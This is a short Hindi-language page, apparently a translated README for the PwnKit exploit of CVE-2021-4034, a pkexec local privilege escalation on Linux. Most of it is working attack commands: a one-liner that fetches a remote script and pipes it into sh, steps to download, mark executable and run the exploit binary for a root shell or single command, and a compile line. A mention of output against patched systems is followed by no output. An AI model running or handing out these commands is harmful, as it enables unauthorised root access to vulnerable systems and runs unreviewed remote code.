
CVE-2021-4034 के लिए स्व-निहित शोषण - Pkexec स्थानीय विशेषाधिकार वृद्धि
CVE-2021-4034 के लिए स्व-निहित शोषण - Pkexec स्थानीय विशेषाधिकार वृद्धि
यह उबंटू, डेबियन, फेडोरा और सेंटओएस पर आधारित कमजोर लिनक्स वितरणों पर बिना किसी बदलाव के काम करना चाहिए।
sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x ./PwnKit
./PwnKit # इंटरैक्टिव शेल
./PwnKit 'id' # एकल कमांड
पैच किए गए संस्करणों के विरुद्ध शोषण चलाने पर निम्न आउटपुट प्राप्त होगा।
gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC